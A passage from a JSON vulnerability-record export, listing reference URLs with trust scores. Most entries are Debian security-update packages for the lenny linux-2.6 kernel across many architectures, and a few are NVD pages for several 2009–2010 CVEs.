        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0307"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0298"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4027"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
